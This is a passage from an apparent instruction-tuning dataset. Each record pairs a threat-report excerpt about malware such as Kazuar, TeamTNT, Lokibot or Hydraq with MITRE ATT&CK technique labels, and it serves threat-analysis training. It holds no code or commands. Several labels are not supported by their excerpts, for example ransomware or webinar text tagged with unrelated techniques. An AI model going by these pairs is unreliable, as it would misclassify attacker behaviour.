and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Unlike previous RDAT samples, this particular sample only uses DNS tunneling for its C2 communications with no HTTP fallback channel. This RDAT sample can only use TXT queries in its DNS tunnel and will issue queries structured like the following", + "output": "- T1071.004: Application Layer Protocol - DNS\n- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware initializes by gathering system and malware filename information and creates a mutex to make sure only one instance of the Trojan executes on the system at a time. Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \u201c[username]=>singleton-instance-mutex\u201d. The Trojan then encrypts this MD5 hash using an XOR algorithm and the serial number of the storage volume. Kazuar uses the resulting ciphertext to generate a GUID that it appends to the string \u201cGlobal\\\\\u201d to create the mutex", + "output": "- T1087.001: Account Discovery - Local Account\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Key takeaways: - TeamTNT is using new, open source tools to steal usernames and passwords from infected machines. The campaign has been active for approximately one month and is responsible for thousands of infections globally. Background . TeamTNT has been one of the most active threat groups since mid 2020. One of the most recent findings (June 4, 2021) came from Palo Alto\u00a0researchers who discovered the TeamTNT Chimaera repository. TeamTNT C&C website showing infection statistics . Figure 2. The full list of supported programs can be found on the Lazagne page on Github. Windows module - persistence . Kubernetes root payload component . This component is mainly responsible for installing a cryptocurrency miner on infected devices, allowing the attacker to connect remotely to the system using SSH. Decoded shell script . TeamTNT IRC bot . As described previously this year by Lacework, TeamTNT includes ZiggyStartux in their IRC bot. IRC Bot available commands . TeamTNT AWS stealer . Similar to the other TeamTNT components, the AWS stealer (see figure 11) first installs missing dependencies. Conclusion . AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "At line 40, that data is piped through the base64 utility for decoding, dropped in a subfolder in the /tmp directory, given executable permissions via chmod, and then launched as the 2nd stage payload", + "output": "- T1222.002: File and Directory Permissions Modification - Linux and Mac File and Directory Permissions Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sodinokibi ransomware, also known as REvil or Sodin, has been responsible for a series of high-profile attacks since April 2019", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs", + "output": "- T1555.004: Credentials from Password Stores - Windows Credential Manager" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username - IP Address from Network Adapter Configuration - OS Name - OS Architecture - Computer Name - Computer Domain Name - Username", + "output": "- T1016: System Network Configuration Discovery\n- T1047: Windows Management Instrumentation\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. The backchannel URL addresses have been changed by the Dynamic DNS sites to resolve to a loopback address (127.0.0.2). This in effect severs the connection to the control servers. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim\u2019s machine by taking advantage of the vulnerability. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the \u201cattack surface\u201d by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One of the most noticeable differences is the use of encryption over the entire TCP segment, as a way for it to evade detection. Additionally, this seems to be a lightweight version of Gh0stRAT, as it only has 12 commands, compared to the 73 for a full Gh0stRAT sample; 3 of those commands are undocumented. Also, unlike most samples that I receive on my honeypot, this sample did not start as a DLL that communicates to a distribution server in order to download the stage1", + "output": "- T1573: Encrypted Channel\n- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access", + "output": "- T1219: Remote Access Software\n- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The name EvilBunny is derived from debug information embedded in the malware\u2019s dropper. Furthermore, the specified piece incorporates a Lua 5.1 interpreter, which allows the malware to execute Lua scripts and change its behavior at runtime. The dropper will place the EvilBunny malware under %APPDATA%\\Perf Manager\\ or %WINDIR%\\msapps\\; depending whether the dropper is running with administrative privileges or not. Also, the malware will generate numerous files to help its execution and frequently reply back to the C&C with status messages. Similar to its dropper, the binary seeks to evade sandboxes. Next to that, the main thread also runs sub threads to maintain log files the malware creates during execution and to keep track of the overall system load the malware creates. The worker threads are internally dubbed \u2018hearer\u2019, which is believed to stand for \u2018listener\u2019. It can be concluded thereafter that the malware authors were no English native speakers. The main action of the malware is carried out in the main thread, which parses commands and executes Lua scripts, provided by the worker threads via command files. Each hearer has a dedicated method to receive instructions which is either separately via HTTP from the server, aggregated through a downloaded data file or as tasks to be configured as scheduled tasks. In general this is a rather uncommon technique, but it has been observed before, especially in connection with some adware variants", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sends phishing mail to given recipients and receives user\u2019s access token using device code authentication flow", + "output": "- T1528: Steal Application Access Token" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"First-stage analysis . When the user opens the phishing email, it presents a Spanish social engineering message (\"\"Payment: Find scheduled payment dates attached\"\"). The figure below shows a screenshot of one of the emails we looked at. It decrypts the URL for the second-stage from hardcoded bytes, saves it to the \"\"Templates\"\" folder, and executes it. Second-stage analysis . The second-stage executable is packed with a Delphi-based packer. The DLL sets a timer, as shown below, which will execute the downloader function periodically. The DLL decodes the hex string using the following steps: We have written a small Python script to decrypt the third stage. The same decryption method was also used to decrypt the hardcoded command and control (C2).The resulting file is also a DLL, which the second stage reflectively loads. Injected DLL analysis (UAC bypass using two techniques) . It checks if `C:\\Windows\\Finex` exists. Decrypting and executing Lokibot . After attempting to bypass the UAC, the third-stage DLL will check if `AutoRunKeyFlag` is set. For this DLL, it is not set. This dropper uses three stages and three layers of encryption to hide its final payload\"", + "output": "- T1053: Scheduled Task/Job" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This step establishes the persistence of the malware across reboots on the endpoint - Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Interestingly as we continued to expand and pivot in our data set, one of the C2 IPs used by an IRC bot payload from Magic Hound was found to be the same IP used to deliver a different IRC bot called MPK", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "They include registry, file system manipulations, and searching files with specific patterns, and retrieving and transferring them back to the server and gathering network status information", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Its functions include self-starting of the backdoor, collection of network configuration, keystroke records, and schedule other modules to execute by means of timers", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Talos has identified at least three different campaigns since July 2019. It is interesting to note that this threat actor uses HTTPS on the C2. They always use self-signed certificates", + "output": "- T1587.003: Develop Capabilities - Digital Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware will then write a base64 encoded PowerShell script (which is contained in xmlparse.dll as a resource) to \\%TEMP%\\enu1.ps1 and execute it. The script, intended for reconnaissance purposes, checks if a machine is part of a domain and if the user has Admin privileges or is part of the Admin Group", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to stealing banking and other sensitive credentials for exfiltration by attackers. The payload that Talos analyzed was a multi-stage payload, with the initial stage featuring several anti-analysis techniques designed to make analysis more difficult and prolonged execution to avoid detection. It also featured several evasion techniques designed to ensure that the malware would not execute properly in automated analysis environments, or sandboxes. The overall operation of the Zeus Panda banking trojan has been well documented, however Talos wanted to provide additional information about the first stage packer used by the malware. The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects the any of the following keyboard mappings", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1614.001: System Location Discovery - System Language Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For the purpose of social engineering, the threat actor chose file names related to legitimate online services, including Microsoft OneDrive. In a few instances, we observed the use of file names resembling McAfee\u2019s endpoint security product. Even the file icons for these binaries are selected to masquerade as the corresponding legitimate applications", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The TajMahal framework is an intriguing discovery that\u2019s of great interest, not least for its high level of technical sophistication, which is beyond any doubt. For example, it has its own indexer, emergency C2s, is capable of stealing specific files from external drives when they become available again, etc", + "output": "- T1119: Automated Collection\n- T1083: File and Directory Discovery\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Analysis of the \u201clog.dat\u201d payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications. Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government, with a mission that would benefit nation-state geopolitical and economic needs. APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts from trusted third parties, sometimes coupled with social engineering tactics. Register today to gain deeper insights into this threat group", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The \u2018tasklist\u2019 command will use a WMI query or the \u201cps\u201d command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar\u2019s \u2018cmd\u2019 command will run commands using \u201ccmd.exe\u201d for Windows systems and \u201c/bin/bash\u201d for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems", + "output": "- T1047: Windows Management Instrumentation\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Obviously, the request sent to the C&C is encoded with Base64. The bot subsequently receives its unique ID and uses it for identification at the start of the packet", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Writes itself to %AppData%\\Microsoft\\Word\\log.ps1 2) Sets up persistence for this file, using a run key. 3) Adds a registry key so that future powershell.exe instances are spawned off-screen by default \u2013 this trick is explained here. 6) Removes all registry entries that are left behind during the dropper process", + "output": "- T1564.003: Hide Artifacts - Hidden Window\n- T1112: Modify Registry\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After deobfuscation you can see \u201cImminent Monitor\u201d string which may indicate it is related to Imminent Monitor RAT", + "output": "- T1125: Video Capture\n- T1123: Audio Capture\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In February 2013, AlienVault performed analysis on the CallMe Trojan and found that it is based on a tool called Tiny SHell, an OSX shell tool whose source code is available on the Internet. The Trojan uses AES to encrypt the communication channel its C2 server, which will provide one of three commands to carry out activities on the compromised system, as seen in Table 4", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography\n- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Aside from the aforementioned executables, the droppers also contained a remote access Trojan (RAT). The RAT executable allows criminals to perform various operations on a host, such as uploading/downloading, executing files, etc", + "output": "- T1547: Boot or Logon Autostart Execution\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CTU analysis indicates that BRONZE BUTLER primarily targets organizations located in Japan. The threat group has sought unauthorized access to networks of organizations associated with critical infrastructure, heavy industry, manufacturing, and international relations. Secureworks analysts have observed BRONZE BUTLER exfiltrating the following categories of data", + "output": "- T1039: Data from Network Shared Drive\n- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Trojan will attempt to inject code into these browsers to carry out its C2 communications. To carry out C2 communications via injected code in a remote process, the injected code reaches out to the C2 server and saves the response to a memory mapped file named SNFIRNW. Command and Control Communications In addition to being able to communicate with its C2 server from code injected into a web browser, the Trojan can also carry out the same communication process within its own process", + "output": "- T1071.001: Application Layer Protocol - Web Protocols\n- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All the scripts are deleted immediately after being executed. TeamTNT also uses the \u201chistory -c\u201d command to clear the shell log in every script", + "output": "- T1070.003: Indicator Removal - Clear Command History\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact", + "output": "- T1560: Archive Collected Data\n- T1573.001: Encrypted Channel - Symmetric Cryptography\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Figure 6: Transparent Tribe's spear-phishing email targeting defense personnel. This is in line with previous reporting on Transparent Tribe's use of official COVID-19 applications and content to serve Android malware. Figure 7: Attached malicious XLS macro. Another lure targeted Indian Defense Advisors attached to various Indian embassies in Southeast Asia, as seen in Figure 8", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Execute a remote shell; - Silently start a program on a victim host; - Retrieve a list of processes from the victim host; - Terminate any process; - Upload/Download/Delete files to/from victim host; - Retrieve a list of available drives from the victim host; - Retrieve a filelist of a specified folder from the victim host", + "output": "- T1105: Ingress Tool Transfer\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques 